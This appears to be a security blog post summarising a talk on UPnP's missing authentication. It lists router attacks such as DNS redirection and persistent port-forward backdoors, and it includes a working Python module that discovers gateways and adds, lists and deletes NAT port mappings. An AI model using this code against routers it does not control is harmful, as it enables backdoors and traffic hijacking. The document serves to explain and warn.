Talk: Attack UPnP – The Useful plug and pwn protocols

René Pfeiffer/ June 18, 2011/ Security

Most firewall admins are quite allergic to Universal Plug and Play (UPnP), which is why it is usually turned off. Arron „Finux“ Finnon explains what UPnP can do. Its intended use is to facilitate data transmissions of UPnP-capable devices, meaning that these devices and their software can use UPnP to poke holes into NAT devices and firewalls. Enabling UPnP on a spare router with an open Wi-Fi network lets you learn a lot about your neighbours: you can enumerate devices and identify what they are requesting. And this is just the beginning.

UPnP solved its security problems by not implementing any security

It’s a bit like Bonjour, a bit like mDNS, a bit like this and that. From the security point of view it’s a nightmare: there is no authentication and no authorisation, so UPnP will happily do anything you ask of it. You can modify filter rules and configure NAT from any device on the network. You can add a NAT rule that makes the web interface of your router reachable from the outside via UPnP, even though you have disabled external access to the management web interface. Any sane sysadmin turns it off, but it is enabled on most home routers not configured by people with background knowledge. It often stays enabled on devices such as smart phones, multimedia players, TV sets, game consoles, VoIP phones, printers and the like.

What are the hacks? Well, you can open port 53 on the router, on the inside and on the outside, redirect traffic to a rogue DNS server and hijack data transmissions with fake DNS answers. You can trick Microsoft Windows into downloading malicious image files from the Internet. Due to poor error checking you can put NAT rules into non-volatile memory, so that the trick „turn it off and on again“ doesn’t work anymore. This means you can put backdoors into a router (by using port forwardings) that stay there. You can exhaust port ranges used for specific protocols (such as VoIP). You can remove port mappings as well. You can list all dynamic port mappings of a device.
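To make the two preceding paragraphs concrete, here is an added example that is not code from the talk or from this post: a small Python module that walks the UPnP IGD (Internet Gateway Device) exchange a LAN client performs against a router. It builds the SSDP M-SEARCH discovery request, reads the LOCATION header of the reply, pulls the WANIPConnection control URL out of the root device description, and issues the SOAP actions AddPortMapping (the port-53 forwarding from the text) and GetGenericPortMappingEntry (listing every mapping until the gateway returns UPnP error 713). Note that no credential appears anywhere in the exchange. The SSDP reply, device description, gateway answers and the names SAMPLE_SSDP, SAMPLE_DESC, fake_gateway and demo are constructed for this example; fake_gateway stands in for the HTTP transport so the module runs offline.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urljoin
from xml.sax.saxutils import escape

IGD_ST = "urn:schemas-upnp-org:device:InternetGatewayDevice:1"
DEV_NS = "{urn:schemas-upnp-org:device-1-0}"
WAN_SERVICES = ("urn:schemas-upnp-org:service:WANIPConnection:1",
                "urn:schemas-upnp-org:service:WANPPPConnection:1")

def build_msearch(st=IGD_ST, mx=2):
    """SSDP M-SEARCH request, sent as one UDP datagram to 239.255.255.250:1900."""
    return ("M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n"
            'MAN: "ssdp:discover"\r\n' f"MX: {mx}\r\nST: {st}\r\n\r\n").encode()

def parse_ssdp_response(raw):
    """Headers (upper-cased names) of an SSDP 200 OK; LOCATION points at the description."""
    status, _, rest = raw.decode(errors="replace").partition("\r\n")
    if not status.startswith("HTTP/1.1 200"):
        raise ValueError("not an SSDP 200 OK: " + status)
    headers = {}
    for line in rest.split("\r\n"):
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().upper()] = value.strip()
    return headers

def find_wan_service(description_xml, location):
    """(serviceType, absolute controlURL) of the first WAN*Connection service: the NAT control endpoint."""
    for svc in ET.fromstring(description_xml).iter(DEV_NS + "service"):
        stype = (svc.findtext(DEV_NS + "serviceType") or "").strip()
        if stype in WAN_SERVICES:
            return stype, urljoin(location, (svc.findtext(DEV_NS + "controlURL") or "").strip())
    raise LookupError("no WANIPConnection/WANPPPConnection service in description")

def build_soap(service_type, action, args):
    """Headers and SOAP body for one IGD action; args is an ordered (name, value) list."""
    body = ('<?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
            's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>'
            f'<u:{action} xmlns:u="{service_type}">'
            + "".join(f"<{n}>{escape(str(v))}</{n}>" for n, v in args)
            + f"</u:{action}></s:Body></s:Envelope>")
    return ({"Content-Type": 'text/xml; charset="utf-8"',
             "SOAPAction": f'"{service_type}#{action}"'}, body.encode())

def add_port_mapping(service_type, ext_port, proto, int_client, int_port, desc="demo", lease=0):
    """Forward WAN ext_port/proto to int_client:int_port; lease 0 asks for an entry without expiry."""
    return build_soap(service_type, "AddPortMapping", [
        ("NewRemoteHost", ""), ("NewExternalPort", ext_port), ("NewProtocol", proto),
        ("NewInternalPort", int_port), ("NewInternalClient", int_client), ("NewEnabled", 1),
        ("NewPortMappingDescription", desc), ("NewLeaseDuration", lease)])

def parse_soap_args(xml_bytes):
    """Flatten the New* arguments (or the UPnP fault code) of a request or response."""
    out = {}
    for el in ET.fromstring(xml_bytes).iter():
        tag = el.tag.rsplit("}", 1)[-1]
        if tag.startswith("New") or tag in ("errorCode", "errorDescription"):
            out[tag] = (el.text or "").strip()
    return out

def list_port_mappings(service_type, call):
    """Walk GetGenericPortMappingEntry with index 0, 1, 2, ... until the gateway answers UPnP
    error 713 (SpecifiedArrayIndexInvalid). call(headers, body) POSTs to the controlURL and
    returns the response body; faults arrive as HTTP 500, so keep that body as well."""
    mappings, index = [], 0
    while True:
        entry = parse_soap_args(call(*build_soap(
            service_type, "GetGenericPortMappingEntry", [("NewPortMappingIndex", index)])))
        if "errorCode" in entry:
            if entry["errorCode"] == "713":
                return mappings
            raise RuntimeError(f"UPnP error {entry['errorCode']}: {entry.get('errorDescription')}")
        mappings.append(entry)
        index += 1

# Constructed sample traffic for an offline run; not captured from any real device.
SAMPLE_SSDP = (b"HTTP/1.1 200 OK\r\nCACHE-CONTROL: max-age=1800\r\nEXT:\r\nSERVER: demo UPnP/1.0\r\n"
               b"LOCATION: http://192.168.1.1:5000/rootDesc.xml\r\nST: " + IGD_ST.encode() + b"\r\n"
               b"USN: uuid:demo::" + IGD_ST.encode() + b"\r\n\r\n")
SAMPLE_DESC = (b'<?xml version="1.0"?><root xmlns="urn:schemas-upnp-org:device-1-0"><device>'
               b"<deviceList><device><serviceList><service><serviceType>urn:schemas-upnp-org:"
               b"service:WANIPConnection:1</serviceType><controlURL>/ctl/IPConn</controlURL>"
               b"</service></serviceList></device></deviceList></device></root>")
ENVELOPE = b'<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>%s</s:Body></s:Envelope>'

def fake_gateway(headers, body):
    """Stand-in transport: answers like a gateway whose NAT table holds exactly one mapping."""
    if parse_soap_args(body)["NewPortMappingIndex"] == "0":
        return ENVELOPE % (
            b'<u:GetGenericPortMappingEntryResponse xmlns:u="%s">' % WAN_SERVICES[0].encode()
            + b"<NewRemoteHost></NewRemoteHost><NewExternalPort>53</NewExternalPort><NewProtocol>UDP"
            b"</NewProtocol><NewInternalPort>53</NewInternalPort><NewInternalClient>192.168.1.50"
            b"</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>dns"
            b"</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration>"
            b"</u:GetGenericPortMappingEntryResponse>")
    return ENVELOPE % (b'<s:Fault><detail><UPnPError xmlns="urn:schemas-upnp-org:control-1-0">'
                       b"<errorCode>713</errorCode><errorDescription>SpecifiedArrayIndexInvalid"
                       b"</errorDescription></UPnPError></detail></s:Fault>")

def demo():
    """Discovery -> description -> control URL -> NAT table, run over the sample traffic."""
    location = parse_ssdp_response(SAMPLE_SSDP)["LOCATION"]
    stype, control = find_wan_service(SAMPLE_DESC, location)
    return control, list_port_mappings(stype, fake_gateway)
```

Against a real gateway you send build_msearch() over UDP to the multicast group, fetch the LOCATION URL with any HTTP client, and POST each (headers, body) pair to the control URL; DeletePortMapping is the same build_soap call with just NewRemoteHost, NewExternalPort and NewProtocol, which is all a gateway needs to drop someone else's mapping. The transport is passed in as a callable so the walk over the NAT table can be exercised offline against fake_gateway and on the wire against a router without changing the protocol code.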

The list goes on and on and on

Despite these design flaws UPnP is widely used. Even malware has UPnP capabilities, for obvious reasons. Still, UPnP is added to router models and deployed to customers, mainly to reduce the number of support calls about software/games/things that aren’t working.

So even if you know about UPnP and turn it off, watch out for its presence in networks you might use. You’ve got a smart phone with Wi-Fi, right?


About René Pfeiffer

System administrator, lecturer, hacker, security consultant, technical writer and DeepSec organisation team member. Has done some particle physics, too. Prefers encrypted messages for the sake of admiring the mathematical algorithms at work.